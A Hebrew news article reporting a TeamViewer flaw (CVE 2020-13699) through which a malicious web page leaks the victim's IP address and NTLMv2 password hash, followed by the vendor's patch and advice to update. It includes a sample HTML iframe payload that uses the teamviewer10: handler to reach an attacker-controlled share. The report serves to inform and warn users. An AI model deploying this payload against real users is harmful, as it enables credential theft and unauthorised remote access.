משתמשים ב-Teamviewer? פרצת אבטחה חמורה התגלתה בתוכנת ההתחברות מרחוק הפופולארית, בחברה שחררו עדכון שסותם את הפרצה באופן מידי.
Teamviewer נחשבת לאחת התוכנות הפופולריות כיום באינטרנט בתחום ההתחברות מרחוק, שיתוף המחשבים והתמיכה הטכנית. כעת מסתבר שבכל גרסאות התוכנה האחרונות, מ-8 ועד 15, קיימת פרצת אבטחה המאפשרת לתוקפים להשיג את הסיסמה למחשב שלכם בעזרת קוד HTML פשוט. הפרצה, הפועלת בעזרת "שכנוע" של הקורבנות לבקר באתר מסויים המכיל את הקוד הזדוני, גורם לתוכנה להתחבר באופן אוטומטי למחשב של התוקף ובכך חושף גם את כתובת ה-IP שלכם וגם גרסת NTLMv2 של הסיסמה, מה שמאפשר לתוקפים להתחבר למחשב שלכם בקלות.
הנה דוגמה לקוד הזדוני:
<html> <head> <title>תמונות משפחתיות</title> </head> <body> <h1>תמונות משפחתיות</h1> <iframe src="teamviewer10: --play \\אייפי של התוקף\share\fake.tvs"></iframe> </body> </html>
בחברה הגרמנית המפתחת את התוכנה הוציאו עדכון אבטחה דחוף (CVE 2020-13699) ומבקשים מכל המשתמשים לבצע אותו בהקדם. בכל מקרה, תמיד מומלץ כמובן להשתמש בגרסה האחרונה של התוכנה כדי לקבל את כל עדכוני האבטחה האפשריים.
Teamviewer הינה תוכנת שליטה מרחוק ושיתוף מחשבים המאפשרת לחלוק את מסך המחשב (והקבצים שלכם) יחד עם מחשבים נוספים, למטרות עבודה או תמיכה טכנית. התוכנה ראתה אור לראשונה ב-2005 והפכה לפופלארית ביותר בתחום לצד תוכנות כמו AnyDesk או Remote Administrator. לתוכנה גרסאות למערכות הפעלה ומכשירים רבים, ביניהם Windows, macOS, Linux, Chrome OS, iOS, Android, Windows Phone ו-BlackBerry. הפרצה התגלתה לראשונה על ידי ג'פרי הופמן מחברת פרטוריאן.